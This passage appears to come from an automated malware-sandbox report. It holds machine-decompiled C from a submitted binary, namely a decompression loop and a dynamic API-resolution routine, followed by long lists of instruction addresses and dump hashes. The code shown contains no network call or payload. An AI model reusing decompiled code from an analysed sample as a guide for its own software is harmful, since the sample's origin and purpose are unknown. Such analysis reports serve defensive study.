							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                0x00000000
                                                                                                                0x00406131
                                                                                                                0x00406131
                                                                                                                0x00406136
                                                                                                                0x004061ad
                                                                                                                0x004061b4
                                                                                                                0x004061be
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x004067a0
                                                                                                                0x004067a0
                                                                                                                0x004067a6
                                                                                                                0x004067ac
                                                                                                                0x004067b2
                                                                                                                0x004067cc
                                                                                                                0x004067cf
                                                                                                                0x004067d5
                                                                                                                0x004067e0
                                                                                                                0x004067e2
                                                                                                                0x004067b4
                                                                                                                0x004067b4
                                                                                                                0x004067c3
                                                                                                                0x004067c7
                                                                                                                0x004067c7
                                                                                                                0x004067ec
                                                                                                                0x00406813
                                                                                                                0x00406813
                                                                                                                0x00406819
                                                                                                                0x00406819
                                                                                                                0x00000000
                                                                                                                0x004067ee
                                                                                                                0x004067ee
                                                                                                                0x004067f2
                                                                                                                0x004069a1
                                                                                                                0x00000000
                                                                                                                0x004069a1
                                                                                                                0x004067fe
                                                                                                                0x00406805
                                                                                                                0x0040680d
                                                                                                                0x00406810
                                                                                                                0x00000000
                                                                                                                0x00406810
                                                                                                                0x00406138
                                                                                                                0x00406138
                                                                                                                0x0040613c
                                                                                                                0x00406144
                                                                                                                0x00406147
                                                                                                                0x00406149
                                                                                                                0x0040614c
                                                                                                                0x0040614e
                                                                                                                0x00406153
                                                                                                                0x00406156
                                                                                                                0x0040615d
                                                                                                                0x00406164
                                                                                                                0x00406167
                                                                                                                0x00406172
                                                                                                                0x0040617a
                                                                                                                0x0040617a
                                                                                                                0x00406174
                                                                                                                0x00406174
                                                                                                                0x00406174
                                                                                                                0x00406169
                                                                                                                0x00406169
                                                                                                                0x00406169
                                                                                                                0x00406181
                                                                                                                0x0040619f
                                                                                                                0x004061a1
                                                                                                                0x00406374
                                                                                                                0x00406374
                                                                                                                0x00406377
                                                                                                                0x0040637a
                                                                                                                0x0040637d
                                                                                                                0x00406380
                                                                                                                0x00406383
                                                                                                                0x00406386
                                                                                                                0x00406389
                                                                                                                0x0040638c
                                                                                                                0x00406392
                                                                                                                0x004063aa
                                                                                                                0x004063ad
                                                                                                                0x004063b0
                                                                                                                0x004063b3
                                                                                                                0x004063b3
                                                                                                                0x004063b6
                                                                                                                0x004063bc
                                                                                                                0x00406394
                                                                                                                0x00406394
                                                                                                                0x0040639c
                                                                                                                0x004063a1
                                                                                                                0x004063a3
                                                                                                                0x004063a5
                                                                                                                0x004063a5
                                                                                                                0x004063c6
                                                                                                                0x004063c9
                                                                                                                0x0040636c
                                                                                                                0x00406372
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004063cb
                                                                                                                0x00406347
                                                                                                                0x0040634b
                                                                                                                0x00406953
                                                                                                                0x00000000
                                                                                                                0x00406953
                                                                                                                0x00406351
                                                                                                                0x00406354
                                                                                                                0x00406357
                                                                                                                0x0040635b
                                                                                                                0x0040635e
                                                                                                                0x00406364
                                                                                                                0x00406366
                                                                                                                0x00406366
                                                                                                                0x00406369
                                                                                                                0x00000000
                                                                                                                0x00406369
                                                                                                                0x00406183
                                                                                                                0x00406183
                                                                                                                0x00406186
                                                                                                                0x0040618c
                                                                                                                0x0040618e
                                                                                                                0x0040618e
                                                                                                                0x00406191
                                                                                                                0x00406194
                                                                                                                0x00406196
                                                                                                                0x00406197
                                                                                                                0x0040619a
                                                                                                                0x00406207
                                                                                                                0x00406207
                                                                                                                0x0040620b
                                                                                                                0x0040620e
                                                                                                                0x00406211
                                                                                                                0x00406214
                                                                                                                0x00406217
                                                                                                                0x00406218
                                                                                                                0x0040621b
                                                                                                                0x0040621d
                                                                                                                0x00406223
                                                                                                                0x00406226
                                                                                                                0x00406229
                                                                                                                0x0040622c
                                                                                                                0x0040622f
                                                                                                                0x00406235
                                                                                                                0x00406251
                                                                                                                0x00406254
                                                                                                                0x00406257
                                                                                                                0x0040625a
                                                                                                                0x00406261
                                                                                                                0x00406267
                                                                                                                0x0040626b
                                                                                                                0x00406237
                                                                                                                0x00406237
                                                                                                                0x0040623b
                                                                                                                0x00406243
                                                                                                                0x00406248
                                                                                                                0x0040624a
                                                                                                                0x0040624c
                                                                                                                0x0040624c
                                                                                                                0x00406275
                                                                                                                0x00406278
                                                                                                                0x004061ef
                                                                                                                0x004061ef
                                                                                                                0x004061f5
                                                                                                                0x004062a8
                                                                                                                0x004062ae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004062b0
                                                                                                                0x004062b3
                                                                                                                0x004062b6
                                                                                                                0x004062b9
                                                                                                                0x004062bc
                                                                                                                0x004062bf
                                                                                                                0x004062c2
                                                                                                                0x004062c5
                                                                                                                0x004062c8
                                                                                                                0x004062ce
                                                                                                                0x004062e6
                                                                                                                0x004062e9
                                                                                                                0x004062ec
                                                                                                                0x004062ef
                                                                                                                0x004062ef
                                                                                                                0x004062f2
                                                                                                                0x004062f8
                                                                                                                0x004062d0
                                                                                                                0x004062d0
                                                                                                                0x004062d8
                                                                                                                0x004062dd
                                                                                                                0x004062df
                                                                                                                0x004062e1
                                                                                                                0x004062e1
                                                                                                                0x00406302
                                                                                                                0x00406305
                                                                                                                0x00406283
                                                                                                                0x00406287
                                                                                                                0x00406947
                                                                                                                0x00000000
                                                                                                                0x00406947
                                                                                                                0x0040628d
                                                                                                                0x00406290
                                                                                                                0x00406293
                                                                                                                0x00406297
                                                                                                                0x0040629a
                                                                                                                0x004062a0
                                                                                                                0x004062a2
                                                                                                                0x004062a2
                                                                                                                0x004062a5
                                                                                                                0x004062a5
                                                                                                                0x00406305
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x00406310
                                                                                                                0x00406310
                                                                                                                0x00406313
                                                                                                                0x00406316
                                                                                                                0x0040631a
                                                                                                                0x0040695f
                                                                                                                0x00000000
                                                                                                                0x0040695f
                                                                                                                0x00406320
                                                                                                                0x00406323
                                                                                                                0x00406326
                                                                                                                0x00406329
                                                                                                                0x0040632c
                                                                                                                0x0040632f
                                                                                                                0x00406332
                                                                                                                0x00406334
                                                                                                                0x00406337
                                                                                                                0x0040633a
                                                                                                                0x0040633d
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x004064dc
                                                                                                                0x004064dc
                                                                                                                0x004064df
                                                                                                                0x004064df
                                                                                                                0x00000000
                                                                                                                0x004064df
                                                                                                                0x00406201
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040627e
                                                                                                                0x004061ca
                                                                                                                0x004061ce
                                                                                                                0x0040693b
                                                                                                                0x004069b7
                                                                                                                0x004069bf
                                                                                                                0x004069c6
                                                                                                                0x004069c8
                                                                                                                0x004069cf
                                                                                                                0x004069d3
                                                                                                                0x004069d3
                                                                                                                0x004061d4
                                                                                                                0x004061d7
                                                                                                                0x004061da
                                                                                                                0x004061de
                                                                                                                0x004061e1
                                                                                                                0x004061e7
                                                                                                                0x004061e9
                                                                                                                0x004061e9
                                                                                                                0x004061ec
                                                                                                                0x00000000
                                                                                                                0x004061ec
                                                                                                                0x00406278
                                                                                                                0x00406181
                                                                                                                0x00405fb5
                                                                                                                0x00405fb5
                                                                                                                0x00405fbe
                                                                                                                0x004069cc
                                                                                                                0x004069cc
                                                                                                                0x00000000
                                                                                                                0x004069cc
                                                                                                                0x00405fc4
                                                                                                                0x00000000
                                                                                                                0x00405fcf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fd8
                                                                                                                0x00405fdb
                                                                                                                0x00405fde
                                                                                                                0x00405fe2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fe8
                                                                                                                0x00405feb
                                                                                                                0x00405fed
                                                                                                                0x00405fee
                                                                                                                0x00405ff1
                                                                                                                0x00405ff3
                                                                                                                0x00405ff4
                                                                                                                0x00405ff6
                                                                                                                0x00405ff9
                                                                                                                0x00405ffe
                                                                                                                0x00406003
                                                                                                                0x0040600c
                                                                                                                0x0040601f
                                                                                                                0x00406022
                                                                                                                0x0040602e
                                                                                                                0x00406056
                                                                                                                0x00406058
                                                                                                                0x00406066
                                                                                                                0x00406066
                                                                                                                0x0040606a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040605a
                                                                                                                0x0040605a
                                                                                                                0x0040605d
                                                                                                                0x0040605e
                                                                                                                0x0040605e
                                                                                                                0x00000000
                                                                                                                0x0040605a
                                                                                                                0x00406034
                                                                                                                0x00406039
                                                                                                                0x00406039
                                                                                                                0x00406042
                                                                                                                0x0040604a
                                                                                                                0x0040604d
                                                                                                                0x00000000
                                                                                                                0x00406053
                                                                                                                0x00406053
                                                                                                                0x00000000
                                                                                                                0x00406053
                                                                                                                0x00000000
                                                                                                                0x00406070
                                                                                                                0x00406070
                                                                                                                0x00406074
                                                                                                                0x00406920
                                                                                                                0x00000000
                                                                                                                0x00406920
                                                                                                                0x0040607d
                                                                                                                0x0040608d
                                                                                                                0x00406090
                                                                                                                0x00406093
                                                                                                                0x00406093
                                                                                                                0x00406093
                                                                                                                0x00406096
                                                                                                                0x0040609a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040609c
                                                                                                                0x004060a2
                                                                                                                0x004060cc
                                                                                                                0x004060d2
                                                                                                                0x004060d9
                                                                                                                0x00000000
                                                                                                                0x004060d9
                                                                                                                0x004060a8
                                                                                                                0x004060ab
                                                                                                                0x004060b0
                                                                                                                0x004060b0
                                                                                                                0x004060bb
                                                                                                                0x004060c3
                                                                                                                0x004060c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040610b
                                                                                                                0x00406111
                                                                                                                0x00406114
                                                                                                                0x00406121
                                                                                                                0x00406129
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004060e0
                                                                                                                0x004060e0
                                                                                                                0x004060e4
                                                                                                                0x0040692f
                                                                                                                0x00000000
                                                                                                                0x0040692f
                                                                                                                0x004060f0
                                                                                                                0x004060fb
                                                                                                                0x004060fb
                                                                                                                0x004060fb
                                                                                                                0x004060fe
                                                                                                                0x00406101
                                                                                                                0x00406104
                                                                                                                0x00406109
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004063d0
                                                                                                                0x004063d4
                                                                                                                0x004063f2
                                                                                                                0x004063f5
                                                                                                                0x004063fc
                                                                                                                0x004063ff
                                                                                                                0x00406402
                                                                                                                0x00406405
                                                                                                                0x00406408
                                                                                                                0x0040640b
                                                                                                                0x0040640d
                                                                                                                0x00406414
                                                                                                                0x00406415
                                                                                                                0x00406417
                                                                                                                0x0040641a
                                                                                                                0x0040641d
                                                                                                                0x00406420
                                                                                                                0x00406420
                                                                                                                0x00406425
                                                                                                                0x00000000
                                                                                                                0x00406425
                                                                                                                0x004063d6
                                                                                                                0x004063d9
                                                                                                                0x004063dc
                                                                                                                0x004063e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040643a
                                                                                                                0x0040643e
                                                                                                                0x00406461
                                                                                                                0x00406464
                                                                                                                0x00406467
                                                                                                                0x00406471
                                                                                                                0x00406440
                                                                                                                0x00406440
                                                                                                                0x00406443
                                                                                                                0x00406446
                                                                                                                0x00406449
                                                                                                                0x00406456
                                                                                                                0x00406459
                                                                                                                0x00406459
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040647d
                                                                                                                0x00406481
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406487
                                                                                                                0x0040648b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406491
                                                                                                                0x00406493
                                                                                                                0x00406497
                                                                                                                0x00406497
                                                                                                                0x0040649a
                                                                                                                0x0040649e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004064ee
                                                                                                                0x004064f2
                                                                                                                0x004064f9
                                                                                                                0x004064fc
                                                                                                                0x004064ff
                                                                                                                0x00406509
                                                                                                                0x00000000
                                                                                                                0x00406509
                                                                                                                0x004064f4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406515
                                                                                                                0x00406519
                                                                                                                0x00406520
                                                                                                                0x00406523
                                                                                                                0x00406526
                                                                                                                0x0040651b
                                                                                                                0x0040651b
                                                                                                                0x0040651b
                                                                                                                0x00406529
                                                                                                                0x0040652c
                                                                                                                0x0040652f
                                                                                                                0x0040652f
                                                                                                                0x00406532
                                                                                                                0x00406535
                                                                                                                0x00406538
                                                                                                                0x00406538
                                                                                                                0x0040653b
                                                                                                                0x00406542
                                                                                                                0x00406547
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004065d5
                                                                                                                0x004065d5
                                                                                                                0x004065d9
                                                                                                                0x00406977
                                                                                                                0x00000000
                                                                                                                0x00406977
                                                                                                                0x004065df
                                                                                                                0x004065e2
                                                                                                                0x004065e5
                                                                                                                0x004065e9
                                                                                                                0x004065ec
                                                                                                                0x004065f2
                                                                                                                0x004065f4
                                                                                                                0x004065f4
                                                                                                                0x004065f4
                                                                                                                0x004065f7
                                                                                                                0x004065fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406658
                                                                                                                0x00406658
                                                                                                                0x0040665c
                                                                                                                0x00406983
                                                                                                                0x00000000
                                                                                                                0x00406983
                                                                                                                0x00406662
                                                                                                                0x00406665
                                                                                                                0x00406668
                                                                                                                0x0040666c
                                                                                                                0x0040666f
                                                                                                                0x00406675
                                                                                                                0x00406677
                                                                                                                0x00406677
                                                                                                                0x00406677
                                                                                                                0x0040667a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406428
                                                                                                                0x00406428
                                                                                                                0x0040642b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406767
                                                                                                                0x0040676b
                                                                                                                0x0040678d
                                                                                                                0x00406790
                                                                                                                0x0040679a
                                                                                                                0x00000000
                                                                                                                0x0040679a
                                                                                                                0x0040676d
                                                                                                                0x00406770
                                                                                                                0x00406774
                                                                                                                0x00406777
                                                                                                                0x00406777
                                                                                                                0x0040677a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406824
                                                                                                                0x00406828
                                                                                                                0x00406846
                                                                                                                0x00406846
                                                                                                                0x00406846
                                                                                                                0x0040684d
                                                                                                                0x00406854
                                                                                                                0x0040685b
                                                                                                                0x0040685b
                                                                                                                0x00000000
                                                                                                                0x0040685b
                                                                                                                0x0040682a
                                                                                                                0x0040682d
                                                                                                                0x00406830
                                                                                                                0x00406833
                                                                                                                0x0040683a
                                                                                                                0x0040677e
                                                                                                                0x0040677e
                                                                                                                0x00406781
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406915
                                                                                                                0x00406918
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040654f
                                                                                                                0x00406551
                                                                                                                0x00406558
                                                                                                                0x00406559
                                                                                                                0x0040655b
                                                                                                                0x0040655e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406566
                                                                                                                0x00406569
                                                                                                                0x0040656c
                                                                                                                0x0040656e
                                                                                                                0x00406570
                                                                                                                0x00406570
                                                                                                                0x00406571
                                                                                                                0x00406574
                                                                                                                0x0040657b
                                                                                                                0x0040657e
                                                                                                                0x0040658c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406862
                                                                                                                0x00406862
                                                                                                                0x00406865
                                                                                                                0x0040686c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406871
                                                                                                                0x00406871
                                                                                                                0x00406875
                                                                                                                0x004069ad
                                                                                                                0x00000000
                                                                                                                0x004069ad
                                                                                                                0x0040687b
                                                                                                                0x0040687e
                                                                                                                0x00406881
                                                                                                                0x00406885
                                                                                                                0x00406888
                                                                                                                0x0040688e
                                                                                                                0x00406890
                                                                                                                0x00406890
                                                                                                                0x00406890
                                                                                                                0x00406893
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406899
                                                                                                                0x00406899
                                                                                                                0x0040689d
                                                                                                                0x004068fd
                                                                                                                0x00406900
                                                                                                                0x00406905
                                                                                                                0x00406906
                                                                                                                0x00406908
                                                                                                                0x0040690a
                                                                                                                0x0040690d
                                                                                                                0x00000000
                                                                                                                0x0040690d
                                                                                                                0x0040689f
                                                                                                                0x004068a5
                                                                                                                0x004068a8
                                                                                                                0x004068ab
                                                                                                                0x004068ae
                                                                                                                0x004068b1
                                                                                                                0x004068b4
                                                                                                                0x004068b7
                                                                                                                0x004068ba
                                                                                                                0x004068bd
                                                                                                                0x004068c0
                                                                                                                0x004068d9
                                                                                                                0x004068dc
                                                                                                                0x004068df
                                                                                                                0x004068e2
                                                                                                                0x004068e6
                                                                                                                0x004068e8
                                                                                                                0x004068e8
                                                                                                                0x004068e9
                                                                                                                0x004068ec
                                                                                                                0x004068c2
                                                                                                                0x004068c2
                                                                                                                0x004068ca
                                                                                                                0x004068cf
                                                                                                                0x004068d1
                                                                                                                0x004068d4
                                                                                                                0x004068d4
                                                                                                                0x004068ef
                                                                                                                0x004068f6
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x00406594
                                                                                                                0x00406597
                                                                                                                0x004065cd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x00406700
                                                                                                                0x00406700
                                                                                                                0x00406703
                                                                                                                0x00406705
                                                                                                                0x0040698f
                                                                                                                0x00000000
                                                                                                                0x0040698f
                                                                                                                0x0040670b
                                                                                                                0x0040670e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406714
                                                                                                                0x00406718
                                                                                                                0x0040671b
                                                                                                                0x0040671b
                                                                                                                0x0040671b
                                                                                                                0x00000000
                                                                                                                0x0040671b
                                                                                                                0x00406599
                                                                                                                0x0040659b
                                                                                                                0x0040659d
                                                                                                                0x0040659f
                                                                                                                0x004065a2
                                                                                                                0x004065a3
                                                                                                                0x004065a5
                                                                                                                0x004065a7
                                                                                                                0x004065aa
                                                                                                                0x004065ad
                                                                                                                0x004065c3
                                                                                                                0x004065c8
                                                                                                                0x00406600
                                                                                                                0x00406600
                                                                                                                0x00406604
                                                                                                                0x00406630
                                                                                                                0x00406632
                                                                                                                0x00406639
                                                                                                                0x0040663c
                                                                                                                0x0040663f
                                                                                                                0x0040663f
                                                                                                                0x00406644
                                                                                                                0x00406644
                                                                                                                0x00406646
                                                                                                                0x00406649
                                                                                                                0x00406650
                                                                                                                0x00406653
                                                                                                                0x00406680
                                                                                                                0x00406680
                                                                                                                0x00406683
                                                                                                                0x00406686
                                                                                                                0x004066fa
                                                                                                                0x004066fa
                                                                                                                0x004066fa
                                                                                                                0x00000000
                                                                                                                0x004066fa
                                                                                                                0x00406688
                                                                                                                0x0040668e
                                                                                                                0x00406691
                                                                                                                0x00406694
                                                                                                                0x00406697
                                                                                                                0x0040669a
                                                                                                                0x0040669d
                                                                                                                0x004066a0
                                                                                                                0x004066a3
                                                                                                                0x004066a6
                                                                                                                0x004066a9
                                                                                                                0x004066c2
                                                                                                                0x004066c4
                                                                                                                0x004066c7
                                                                                                                0x004066c8
                                                                                                                0x004066cb
                                                                                                                0x004066cd
                                                                                                                0x004066d0
                                                                                                                0x004066d2
                                                                                                                0x004066d4
                                                                                                                0x004066d7
                                                                                                                0x004066d9
                                                                                                                0x004066dc
                                                                                                                0x004066e0
                                                                                                                0x004066e2
                                                                                                                0x004066e2
                                                                                                                0x004066e3
                                                                                                                0x004066e6
                                                                                                                0x004066e9
                                                                                                                0x004066ab
                                                                                                                0x004066ab
                                                                                                                0x004066b3
                                                                                                                0x004066b8
                                                                                                                0x004066ba
                                                                                                                0x004066bd
                                                                                                                0x004066bd
                                                                                                                0x004066ec
                                                                                                                0x004066f3
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x004066f3
                                                                                                                0x00406606
                                                                                                                0x00406609
                                                                                                                0x0040660b
                                                                                                                0x0040660e
                                                                                                                0x00406611
                                                                                                                0x00406614
                                                                                                                0x00406616
                                                                                                                0x00406619
                                                                                                                0x0040661c
                                                                                                                0x0040661c
                                                                                                                0x0040661f
                                                                                                                0x0040661f
                                                                                                                0x00406622
                                                                                                                0x00406629
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00406629
                                                                                                                0x004065af
                                                                                                                0x004065b2
                                                                                                                0x004065b4
                                                                                                                0x004065b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004064a1
                                                                                                                0x004064a1
                                                                                                                0x004064a5
                                                                                                                0x0040696b
                                                                                                                0x00000000
                                                                                                                0x0040696b
                                                                                                                0x004064ab
                                                                                                                0x004064ae
                                                                                                                0x004064b1
                                                                                                                0x004064b4
                                                                                                                0x004064b6
                                                                                                                0x004064b6
                                                                                                                0x004064b6
                                                                                                                0x004064b9
                                                                                                                0x004064bc
                                                                                                                0x004064bf
                                                                                                                0x004064c2
                                                                                                                0x004064c5
                                                                                                                0x004064c8
                                                                                                                0x004064c9
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064ce
                                                                                                                0x004064d1
                                                                                                                0x004064d4
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x00406722
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406728
                                                                                                                0x0040672b
                                                                                                                0x0040672e
                                                                                                                0x00406731
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406736
                                                                                                                0x00406739
                                                                                                                0x0040673c
                                                                                                                0x0040673f
                                                                                                                0x00406742
                                                                                                                0x00406745
                                                                                                                0x00406746
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x0040674b
                                                                                                                0x0040674e
                                                                                                                0x00406751
                                                                                                                0x00406754
                                                                                                                0x00406757
                                                                                                                0x0040675b
                                                                                                                0x0040675d
                                                                                                                0x00406760
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x00406760
                                                                                                                0x00406995
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                                • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                                                • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                                • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                                0x00405e90
                                                                                                                0x00405e93
                                                                                                                0x00405e9a
                                                                                                                0x00405ea2
                                                                                                                0x00405eaf
                                                                                                                0x00000000
                                                                                                                0x00405eb6
                                                                                                                0x00405ea5
                                                                                                                0x00405ead
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405ebe

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID:
